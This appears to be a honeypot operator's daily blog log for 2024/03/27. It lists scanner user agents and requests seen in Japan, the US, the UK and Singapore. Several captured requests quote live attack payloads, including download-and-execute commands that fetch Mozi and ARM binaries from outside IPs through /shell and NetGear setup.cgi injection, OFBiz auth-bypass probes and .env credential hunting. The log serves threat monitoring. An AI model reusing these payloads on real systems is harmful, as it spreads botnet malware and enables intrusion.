Hello, Bright and Clear Blue Sky

With nothing better to do, spending the whole day before my blog, jotting down at random the trifling thoughts that drift through my mind,

2024/03/27 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2024/03/27.

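Characteristics

Common

Scanning by CensysInspect
Scanning by curl
Scanning by zgrab
Scanning for /.env

Location:JP

The following were observed:

Access targeting vulnerabilities in NetGear products
Scanning for .js files
Scanning for /.git
Scanning for Apache Tomcat
Scanning for WordPress plugins

The following access to /shell was observed: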

cd /tmp;
rm -rf *;
wget  109.205.214.35/arm;
chmod 777 /tmp/arm;
sh /tmp/arm4
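
Location:US

The following were observed:

Access targeting vulnerabilities in NetGear products
Access targeting Spring Boot vulnerabilities
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Scanning for .css files
Scanning for /.git
Scanning for Apache Tomcat
Scanning for config files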

Location:UK

The following were observed:

Access targeting Spring Boot vulnerabilities
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Scanning for .js files
Scanning for /.git
Scanning for Apache Tomcat
Scanning for WordPress

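Location:SG

The following were observed:

Access targeting the Apache OFBiz vulnerability (CVE-2023-51467)
Access targeting Spring Boot vulnerabilities
Access targeting the Spring Cloud Gateway vulnerability (CVE-2022-22947)
Scanning for .js files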

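Access count trend

JP: total accesses: 93 (change from previous day: 11)
US: total accesses: 322 (change from previous day: 201)
UK: total accesses: 84 (change from previous day: -10)
SG: total accesses: 88 (change from previous day: -24)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.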

Location:JP

Source IP addresses


UserAgent list

Count UserAgent
16 -
1 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
2 Go-http-client/1.1
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
1 Mozilla/5.0 (Linux; Android 10; SM-M307F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 11; AC2001) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.101 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 11; Redmi Note 8T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 11; SM-A515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T530NU Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Chrome/38.0.2125.102 Safari/537.36
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:35.0) Gecko/20100101 Firefox/35.0
1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36 Vivaldi/1.0.344.37
24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 15_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 Safari Line/12.6.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 15_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/100.0.4896.77 Mobile/15E148 Safari/604.1
8 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
2 Python-urllib/3.10
1 curl/8.1.2
8 python-requests/2.27.1

Request list

Count Method Request Protocol
1 MGLNDD_18.179.20.5_80\n
1 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfa\x01
10 \x16\x03\x01
1 CONNECT api[.]ipify[.]org:443 HTTP/1.1
1 GET /.env.example HTTP/1.1
29 GET /.env HTTP/1.1
2 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /API/.env HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /Temporary_Listen_Addresses HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /admin/.git/config HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /api/.git/config HTTP/1.1
1 GET /app/.git/config HTTP/1.1
1 GET /backup/.git/config HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /common/.git/config HTTP/1.1
1 GET /druid/index.html HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /h5/static/img/banner-1.5329368.png HTTP/1.1
1 GET /h5/static/logo.png HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4
1 GET /systembc/password.php HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /upl.php HTTP/1.1
1 GET /user/.git/config HTTP/1.1
2 GET /v3/time HTTP/1.1
1 GET /web/.git/config HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /wp-content/.git/config HTTP/1.1
1 GET /wp-content/plugins/.git/config HTTP/1.1
1 GET /wp-content/themes/.git/config HTTP/1.1
1 GET /wp-includes/js/.git/config HTTP/1.1

Location:US

Source IP addresses


UserAgent list

Count UserAgent
9 'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https[:]//www[.]nokia[.]com/networks/ip-networks/deepfield/genome/)'
37 -
2 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
10 Go-http-client/1.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
71 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
26 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
8 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
145 curl/7.54.0
1 python-requests/2.28.1
2 python-requests/2.31.0

Request list

Count Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\x18\x01
1 \x16\x03\x01\x01\x1c\x01
1 \x16\x03\x01\x01\xfb\x01
1 \x16\x03\x01\x02
27 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1 ``
5 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT httpbin[.]org:443 HTTP/1.1
1 GET /+CSCOE+/logon.html HTTP/1.1
1 GET /.env.development HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.old HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.project HTTP/1.1
1 GET /.env.save HTTP/1.1
28 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
1 GET // HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?max-keys=10 HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /YPEn HTTP/1.1
1 GET /__Additional HTTP/1.1
2 GET /_profiler/empty/search/results HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin-app/.env HTTP/1.1
1 GET /admin.asp HTTP/1.1
1 GET /admin.aspx HTTP/1.1
1 GET /admin.cfm HTTP/1.1
1 GET /admin.cgi HTTP/1.1
1 GET /admin.html HTTP/1.1
1 GET /admin.jhtml HTTP/1.1
1 GET /admin.jsa HTTP/1.1
1 GET /admin.jsp HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin.pl HTTP/1.1
1 GET /admin.shtml HTTP/1.1
1 GET /admin/index.html HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /base.asp HTTP/1.1
1 GET /base.aspx HTTP/1.1
1 GET /base.cfm HTTP/1.1
1 GET /base.cgi HTTP/1.1
1 GET /base.html HTTP/1.1
1 GET /base.inc HTTP/1.1
1 GET /base.jhtml HTTP/1.1
1 GET /base.jsa HTTP/1.1
1 GET /base.jsp HTTP/1.1
1 GET /base.php HTTP/1.1
1 GET /base.pl HTTP/1.1
1 GET /base.shtml HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/login.cgi HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /cms/.env HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /confluence/rest/applinks/1.0/manifest HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /default.asp HTTP/1.1
1 GET /default.aspx HTTP/1.1
1 GET /default.cfm HTTP/1.1
1 GET /default.cgi HTTP/1.1
1 GET /default.html HTTP/1.1
1 GET /default.jhtml HTTP/1.1
1 GET /default.jsa HTTP/1.1
1 GET /default.jsp HTTP/1.1
1 GET /default.php HTTP/1.1
1 GET /default.pl HTTP/1.1
1 GET /default.shtml HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /doc/index.html HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /docs/cplugError.html/ HTTP/1.1
1 GET /enviroments/.env.production HTTP/1.1
1 GET /enviroments/.env HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /fedex/.env HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /h5/static/img/banner-1.5329368.png HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /home.aspx HTTP/1.1
1 GET /home.cfm HTTP/1.1
1 GET /home.cgi HTTP/1.1
1 GET /home.html HTTP/1.1
1 GET /home.jhtml HTTP/1.1
1 GET /home.jsa HTTP/1.1
1 GET /home.jsp HTTP/1.1
1 GET /home.php HTTP/1.1
1 GET /home.pl HTTP/1.1
1 GET /home.shtml HTTP/1.1
1 GET /index.asp HTTP/1.1
1 GET /index.aspx HTTP/1.1
1 GET /index.cfm HTTP/1.1
1 GET /index.cgi HTTP/1.1
2 GET /index.html HTTP/1.1
1 GET /index.jhtml HTTP/1.1
1 GET /index.jsa HTTP/1.1
1 GET /index.jsp HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.pl HTTP/1.1
1 GET /index.shtml HTTP/1.1
1 GET /indice.asp HTTP/1.1
1 GET /indice.aspx HTTP/1.1
1 GET /indice.cfm HTTP/1.1
1 GET /indice.cgi HTTP/1.1
1 GET /indice.html HTTP/1.1
1 GET /indice.jhtml HTTP/1.1
1 GET /indice.jsa HTTP/1.1
1 GET /indice.jsp HTTP/1.1
1 GET /indice.php HTTP/1.1
1 GET /indice.pl HTTP/1.1
1 GET /indice.shtml HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /inicio.asp HTTP/1.1
1 GET /inicio.aspx HTTP/1.1
1 GET /inicio.cfm HTTP/1.1
1 GET /inicio.cgi HTTP/1.1
1 GET /inicio.html HTTP/1.1
1 GET /inicio.jhtml HTTP/1.1
1 GET /inicio.jsa HTTP/1.1
1 GET /inicio.jsp HTTP/1.1
1 GET /inicio.php HTTP/1.1
1 GET /inicio.pl HTTP/1.1
1 GET /inicio.shtml HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /live_env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /localstart.asp HTTP/1.1
1 GET /localstart.aspx HTTP/1.1
1 GET /localstart.cfm HTTP/1.1
1 GET /localstart.cgi HTTP/1.1
1 GET /localstart.html HTTP/1.1
1 GET /localstart.jhtml HTTP/1.1
1 GET /localstart.jsa HTTP/1.1
1 GET /localstart.jsp HTTP/1.1
1 GET /localstart.php HTTP/1.1
1 GET /localstart.pl HTTP/1.1
1 GET /localstart.shtml HTTP/1.1
1 GET /login.jsp HTTP/1.1
1 GET /logon.htm HTTP/1.1
1 GET /main.asp HTTP/1.1
1 GET /main.aspx HTTP/1.1
1 GET /main.cfm HTTP/1.1
1 GET /main.cgi HTTP/1.1
1 GET /main.html HTTP/1.1
1 GET /main.jhtml HTTP/1.1
1 GET /main.jsa HTTP/1.1
1 GET /main.jsp HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /main.pl HTTP/1.1
1 GET /main.shtml HTTP/1.1
1 GET /manage/account/login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /menu.asp HTTP/1.1
1 GET /menu.aspx HTTP/1.1
1 GET /menu.cfm HTTP/1.1
1 GET /menu.cgi HTTP/1.1
1 GET /menu.html HTTP/1.1
1 GET /menu.jhtml HTTP/1.1
1 GET /menu.jsa HTTP/1.1
1 GET /menu.jsp HTTP/1.1
1 GET /menu.php HTTP/1.1
1 GET /menu.pl HTTP/1.1
1 GET /menu.shtml HTTP/1.1
1 GET /nmaplowercheck1711481951 HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /pools/default/buckets HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /readme.txt HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /rest/applinks/1.0/manifest HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /script/.env HTTP/1.1
2 GET /sendgrid/.env HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]10[.]136[.]87:53356/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shared/.env HTTP/1.1
1 GET /sources/.env HTTP/1.1
1 GET /start.asp HTTP/1.1
1 GET /start.aspx HTTP/1.1
1 GET /start.cfm HTTP/1.1
1 GET /start.cgi HTTP/1.1
1 GET /start.html HTTP/1.1
1 GET /start.jhtml HTTP/1.1
1 GET /start.jsa HTTP/1.1
1 GET /start.jsp HTTP/1.1
1 GET /start.php HTTP/1.1
1 GET /start.pl HTTP/1.1
1 GET /start.shtml HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET default.asp HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /.env.development HTTP/1.1
1 POST /.env.dist HTTP/1.1
1 POST /.env.old HTTP/1.1
1 POST /.env.prod HTTP/1.1
1 POST /.env.production HTTP/1.1
1 POST /.env.project HTTP/1.1
1 POST /.env.save HTTP/1.1
1 POST /.env HTTP/1.1
1 POST /admin-app/.env HTTP/1.1
1 POST /api/.env HTTP/1.1
1 POST /app/.env HTTP/1.1
1 POST /application/.env HTTP/1.1
1 POST /apps/.env HTTP/1.1
1 POST /back/.env HTTP/1.1
1 POST /cms/.env HTTP/1.1
1 POST /core/.env HTTP/1.1
1 POST /cp/.env HTTP/1.1
1 POST /development/.env HTTP/1.1
1 POST /docker/.env HTTP/1.1
1 POST /enviroments/.env.production HTTP/1.1
1 POST /enviroments/.env HTTP/1.1
1 POST /fedex/.env HTTP/1.1
1 POST /laravel/.env HTTP/1.1
1 POST /live_env HTTP/1.1
1 POST /local/.env HTTP/1.1
1 POST /private/.env HTTP/1.1
1 POST /rest/.env HTTP/1.1
1 POST /script/.env HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /shared/.env HTTP/1.1
1 POST /sources/.env HTTP/1.1
1 POST /system/.env HTTP/1.1
1 PRI * HTTP/2.0

Location:UK

Source IP addresses


UserAgent list

Count UserAgent
24 -
5 Go-http-client/1.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
1 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
9 Mozilla/5.0 zgrab/0.x
2 Mozilla/5.0
3 curl/7.35.0
1 curl/8.1.2

Request list

Count Method Request Protocol
1 -
1 MGLNDD_132.145.66.34_80\n
2 \x03
1 \x16\x03\x01\x01H\x01
1 \x16\x03\x01\x01\xfc\x01
16 \x16\x03\x01
4 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT httpbin[.]org:443 HTTP/1.1
26 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /druid/index.html HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /h5/static/img/banner-1.5329368.png HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /upl.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /wp-config.php HTTP/1.1
1 PRI * HTTP/2.0

Location:SG

Source IP addresses


UserAgent list

Count UserAgent
26 -
1 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
4 Go-http-client/1.1
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15
1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
18 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
9 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 curl/8.1.2
1 page-preview-tool Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Request list

Count Method Request Protocol
1 MGLNDD_13.67.44.234_80
1 \x03
1 \x16\x03\x01\x01H\x01
20 \x16\x03\x01
3 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT httpbin[.]org:443 HTTP/1.1
18 GET /.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /druid/index.html HTTP/1.1
1 GET /f5Zr8cQlknADmaP3t4zICS2hwyc HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /h5/static/img/banner-1.5329368.png HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /upl.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y HTTP/1.1
1 POST /webtools/control/SOAPService HTTP/1.1
1 POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 POST /webtools/control/xmlrpc HTTP/1.1
3 PRI * HTTP/2.0